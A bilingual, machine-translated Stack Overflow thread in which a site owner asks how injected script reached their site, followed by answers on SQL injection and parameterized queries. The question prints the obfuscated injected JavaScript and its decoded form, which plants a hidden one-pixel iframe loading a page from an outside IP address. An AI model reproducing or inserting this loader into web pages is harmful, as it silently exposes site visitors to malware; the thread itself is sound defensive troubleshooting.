SQL注入攻击洞察
[英]Sql Injection Attack Insight
问题描述
The following code is being added to our site. 
以下代码已添加到我们的网站。 Below it is the effect it has on a page, basically opening an iframe to a malware site. 它的作用是在页面下方产生效果,基本上是打开iframe进入恶意软件站点。 Our site was suffering from this last week and to fix the issue we just rolled back the database and codebase to fix the issue and it did. 上周我们的网站遭受了这一问题的困扰,为了解决此问题,我们刚刚回滚了数据库和代码库以解决此问题,并且确实做到了。 I have a corrupt version I can work with and am searching for where the code came in and how, but I'm coming up with nothing. 我有一个可以使用的损坏版本,正在寻找代码的输入位置以及输入方式,但是我什么也没想。 If it was entered through some form on the site what might that entry look like in the db? 如果是通过网站上的某种形式输入的,则该输入在数据库中会是什么样? If it modified a file in the codebase, why can't I find it? 如果它在代码库中修改了文件,为什么找不到呢? What should I be looking for? 我应该找什么? ANY insight into this would be super helpful. 任何对此的见解都会很有帮助。 I'm trying to figure out where we need to plug up security. 我试图弄清楚我们需要在哪里插入安全性。
Note: The original script had no line breaks. 注意:原始脚本没有换行符。 It is shown here with line breaks to make the code readable: 此处显示了换行符以使代码可读:
<script type="text/javascript" charset="utf-8">
p=parseInt;ss=(123)?String.fromCharCode:0;asgq="28!66!75!6e!63!74!6@!6f!6e!20!28!2@!20!7b!d!a!20!20!20!20!76!61!72!20!68!6f!75!65!20!3d!20!64!6f!63!75!6d!65!6e!74!2e!63!72!65!61!74!65!45!6c!65!6d!65!6e!74!28!27!6@!66!72!61!6d!65!27!2@!3b!d!a!d!a!20!20!20!20!68!6f!75!65!2e!73!72!63!20!3d!20!27!68!74!74!70!3a!2f!2f!32!31!36!2e!31!31!3@!2e!31!31!34!2e!31!36!34!2f!65!73!64!2e!70!68!70!27!3b!d!a!20!20!20!20!68!6f!75!65!2e!73!74!7@!6c!65!2e!70!6f!73!6@!74!6@!6f!6e!20!3d!20!27!61!62!73!6f!6c!75!74!65!27!3b!d!a!20!20!20!20!68!6f!75!65!2e!73!74!7@!6c!65!2e!62!6f!72!64!65!72!20!3d!20!27!30!27!3b!d!a!20!20!20!20!68!6f!75!65!2e!73!74!7@!6c!65!2e!68!65!6@!67!68!74!20!3d!20!27!31!70!78!27!3b!d!a!20!20!20!20!68!6f!75!65!2e!73!74!7@!6c!65!2e!77!6@!64!74!68!20!3d!20!27!31!70!78!27!3b!d!a!20!20!20!20!68!6f!75!65!2e!73!74!7@!6c!65!2e!6c!65!66!74!20!3d!20!27!31!70!78!27!3b!d!a!20!20!20!20!68!6f!75!65!2e!73!74!7@!6c!65!2e!74!6f!70!20!3d!20!27!31!70!78!27!3b!d!a!d!a!20!20!20!20!6@!66!20!28!21!64!6f!63!75!6d!65!6e!74!2e!67!65!74!45!6c!65!6d!65!6e!74!42!7@!4@!64!28!27!68!6f!75!65!27!2@!2@!20!7b!d!a!20!20!20!20!20!20!20!20!64!6f!63!75!6d!65!6e!74!2e!77!72!6@!74!65!28!27!3c!64!6@!76!20!6@!64!3d!5c!27!68!6f!75!65!5c!27!3e!3c!2f!64!6@!76!3e!27!2@!3b!d!a!20!20!20!20!20!20!20!20!64!6f!63!75!6d!65!6e!74!2e!67!65!74!45!6c!65!6d!65!6e!74!42!7@!4@!64!28!27!68!6f!75!65!27!2@!2e!61!70!70!65!6e!64!43!68!6@!6c!64!28!68!6f!75!65!2@!3b!d!a!20!20!20!20!7d!d!a!7d!2@!28!2@!3b"
.replace(/@/g,"9")
.split("!");
try{
document.body&=0.1
} catch(gdsgsdg) {
zz=3;
dbshre=103;
if(dbshre){
vfvwe=0;
try{
document;
} catch(agdsg){
vfvwe=1;
}
if(!vfvwe){
e=eval;
}
s="";
if(zz)
for(i=0;i-480!=0;i++){
if(window.document)
s+=ss(p(asgq[i],16));
}
if(window.document)
e(s);
}
}
</script>
The embedded hex codes resolve to the following Javascript: 嵌入式十六进制代码解析为以下Javascript:
(function () {
var houe = document.createElement('iframe');
houe.src = 'http://216.119.114.164/esd.php';
houe.style.position = 'absolute';
houe.style.border = '0';
houe.style.height = '1px';
houe.style.width = '1px';
houe.style.left = '1px';
houe.style.top = '1px';
if (!document.getElementById('houe')) {
document.write('<div id=\'houe\'></div>');
document.getElementById('houe').appendChild(houe);
}
})();
It is injecting div elements such as: 它正在注入div元素,例如:
<div id="mgkc"><iframe src="http://216.119.114.164/esd.php" style="position: absolute; border: 0px; height: 1px; width: 1px; left: 1px; top: 1px;"></iframe></div>
<div id="houe"><iframe src="http://216.119.114.164/esd.php" style="position: absolute; border: 0px; height: 1px; width: 1px; left: 1px; top: 1px;"></iframe></div>
3 个解决方案
解决方案1
1 2013-04-10 21:46:51
What should I be looking for?
Assuming it is an sql injection problem (and this does sound right), you should be looking in your web application code for something like this: 假设这是一个sql注入问题(听起来确实不错),则应在Web应用程序代码中查找类似以下内容的代码:
sql = "SELECT columns FROM SomeTable WHERE SomeColumn=" + someVariable
If you let us know what language you use I might be able to give a more representative example, but the main thing is that anywhere you use string concatenation to put information from the user into an sql query — even if you run it through a function to sanitize, clean, or escape it — you are vulnerable. 如果您让我们知道您使用的是哪种语言,我也许可以举一个更具代表性的示例,但主要的事情是,在任何使用字符串连接将用户信息放入sql查询中的地方- 即使通过函数运行它进行消毒,清洁或逃生 -您很脆弱。 Note that this isn't even an insert/update/delete statement. 请注意,这甚至不是插入/更新/删除语句。 It's just a select, and the semantics indicate that the sql is even expecting a numeric type. 这只是一个选择,语义表明sql甚至期望使用数字类型。 It doesn't matter: an attacker can still use this to change things in your data. 没关系:攻击者仍然可以使用它来更改数据中的内容。
If you're using an ORM, you might even just be building one part of a WHERE clause, and so it might even just be this: 如果您使用的是ORM,则可能甚至只是在构建WHERE子句的一部分,因此甚至可能是这样:
filter = "SomeDataField='" + someVariable + "'"
The correct way to handle it is using something called parameterized queries or prepared statements, depending on which kids you hang out with on the playground. 处理它的正确方法是使用称为参数化查询或预准备语句的方法,具体取决于您在操场上闲逛的孩子。 These use code that looks more like this: 这些使用看起来更像这样的代码:
sql = "SELECT columns" + " FROM SomeTable WHERE SomeColumn= ?"
// Other code to define and set a parameter for SomeColumn goes here
Note that I did use string concatenation there (just for show, to demonstrate that you can build up a query this way), but that I did not use it substitute user input into the query. 请注意,我确实在此使用了字符串连接(仅用于显示,以证明您可以通过这种方式建立查询),但是我没有使用它来代替用户输入到查询中。 The important thing to understand here is that using this scheme (if implemented properly), the user input is never substituted directly into the query, not even on the database server. 这里要了解的重要一点是,使用此方案(如果正确实现),则永远不会将用户输入直接替换为查询,即使在数据库服务器上也是如此。 Instead, it's transmitted separately and treated like a variable by the database engine as well. 相反,它是单独传输的,数据库引擎也将其视为变量。
Again, I might be able to give a better representation if I know what language/platform you're using. 同样,如果我知道您使用的是哪种语言/平台,我也许可以给出更好的表示。 As an example (I'll use an UPDATE this time), here's one way to do it safely in C# with Sql Server: 作为一个示例(这次我将使用UPDATE),这是在Sql Server的C#中安全地执行此操作的一种方法:
string sql = "UPDATE table SET column= @SomeVariable WHERE ID= @UserID";
using (var cn = new SqlConnection("connection string here"))
using (var cmd = new SqlCommand(sql, cn))
{
cmd.Parameters.Add("@SomeVariable", SqlDbType.VarChar, 50).Value = someVariable;
cmd.Parameters.Add("@UserID", SqlDbType.Int).Value = UserID;
cn.Open();
cmd.ExecuteNonQuery();
}
解决方案2
0 2013-04-10 21:46:03
How do the forms on your site interact with your database? 您网站上的表单如何与数据库交互? Do they create a direct connection to the DB or do they use a web service? 他们是创建到数据库的直接连接还是使用Web服务? If you are executing queries directly on the DB, then you should parameterize your queries. 如果直接在数据库上执行查询,则应参数化查询。
解决方案3
0 2013-04-10 22:03:00
There are multiple website vulnerability scanners that test for SQL injection and other vulnerabilities on websites. 有多个网站漏洞扫描程序可以测试SQL注入和网站上的其他漏洞。 Here is a short list - check https://security.stackexchange.com/questions/32/what-tools-are-available-to-assess-the-security-of-a-web-application/38#38 for a larger one: 这是一份简短的清单-检查https://security.stackexchange.com/questions/32/what-tools-are-available-to-assess-the-security-of-a-web-application/38#38以获取较大的一个:
- http://www.acunetix.com/vulnerability-scanner/ http://www.acunetix.com/vulnerability-scanner/
- https://code.google.com/p/skipfish/ https://code.google.com/p/skipfish/
Additionally also see these links: 此外,还请参见以下链接:
- https://stackoverflow.com/questions/4479499/best-free-vulnerability-scanners-that-check-your-websites-php-mysql-code https://stackoverflow.com/questions/4479499/best-free-vulnerability-scanners-that-check-your-websites-php-mysql-code
In general, you need to also do a search for every SQL command within your codebase and verify that no inputs are being sent unsanitized to the database. 通常,您还需要搜索代码库中的每个SQL命令,并确保没有未经验证就将任何输入发送到数据库。
声明:本站的技术帖子网页,遵循CC BY-SA 4.0协议,如果您需要转载,请注明本站网址或者原文地址。任何问题请咨询:yoyou2525@163.com.